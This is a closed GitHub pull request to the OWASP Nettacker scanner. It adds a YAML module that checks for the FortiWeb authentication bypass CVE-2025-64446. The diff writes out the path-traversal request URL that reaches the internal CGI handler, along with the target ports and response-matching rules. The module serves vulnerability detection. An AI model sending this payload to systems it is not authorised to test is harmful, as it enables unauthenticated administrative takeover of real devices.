-
-
Notifications
You must be signed in to change notification settings - Fork 1.1k
Add fortiweb CVE 2025 64446 #1490
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
Closed
Changes from 6 commits
Commits
Show all changes
11 commits
Select commit
Hold shift + click to select a range
7bb8c7b
Add unit tests for is_weak_hash_algo in ssl module
Raavi29 2722012
Move test file to mirror package structure (tests/core/lib/test_ssl.py)
Raavi29 b30c0bf
Fix header comment path and remove unused import
Raavi29 b69e332
Add tests for nettacker/core/ip.py - 61 tests, 83% coverage
Raavi29 f0832f4
Merge branch 'master' of https://github.com/OWASP/Nettacker
Raavi29 56f92f6
Add vulnerability detection module for FortiWeb CVE-2025-64446
Raavi29 35cf8ef
Fix response matching: use condition_type and with stricter content r…
Raavi29 8c7ede4
Remove misplaced tests/test_ip.py and restore original SSL test suite
Raavi29 e7ca6ab
Restore original SSL test suite accidentally stripped from this branch
Raavi29 e9526a9
Ensure GPG signing on branch
Raavi29 77431d7
Add fortiweb_cve_2025_64446_vuln to docs/Modules.md
Raavi29 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,56 @@ | ||
| info: | ||
| name: fortiweb_cve_2025_64446_vuln | ||
| author: Parneet Kaur | ||
| severity: 9 | ||
| description: > | ||
| CVE-2025-64446 is a critical relative path traversal vulnerability in Fortinet FortiWeb | ||
| WAF versions 8.0.1 and earlier. An unauthenticated attacker can send a crafted HTTP request | ||
| to traverse from the REST API path into the internal CGI handler, bypassing authentication | ||
| entirely and allowing execution of privileged administrative commands including creation of | ||
| new administrator accounts. Actively exploited in the wild since October 2025. Added to | ||
| CISA KEV catalog on November 14, 2025. Fixed in FortiWeb 8.0.2. | ||
| reference: | ||
| - https://www.fortiguard.com/psirt/FG-IR-25-513 | ||
| - https://labs.watchtowr.com/when-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass/ | ||
| - https://www.cisa.gov/news-events/alerts/2025/11/14/fortinet-releases-security-advisory-relative-path-traversal-vulnerability-affecting-fortiweb | ||
| profiles: | ||
| - vuln | ||
| - http | ||
| - critical_severity | ||
| - fortinet | ||
| - fortiweb | ||
| - path_traversal | ||
| - authentication_bypass | ||
| payloads: | ||
| - library: http | ||
| steps: | ||
| - method: get | ||
| timeout: 3 | ||
| headers: | ||
| User-Agent: "{user_agent}" | ||
| allow_redirects: false | ||
| ssl: false | ||
| url: | ||
| nettacker_fuzzer: | ||
| input_format: "{{schema}}://{target}:{{ports}}/api/v2.0/cmdb/system/admin?/../../../../../cgi-bin/fwbcgi" | ||
| prefix: "" | ||
| suffix: "" | ||
| interceptors: | ||
| data: | ||
| schema: | ||
| - "http" | ||
| - "https" | ||
| ports: | ||
| - 443 | ||
| - 8443 | ||
| - 80 | ||
| response: | ||
| condition_type: or | ||
| conditions: | ||
| status_code: | ||
| regex: "200" | ||
| reverse: false | ||
| content: | ||
| regex: "fwbcgi|FortiWeb|admin.*privilege|super_admin" | ||
| reverse: false | ||
|
|
||
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Uh oh!
There was an error while loading. Please reload this page.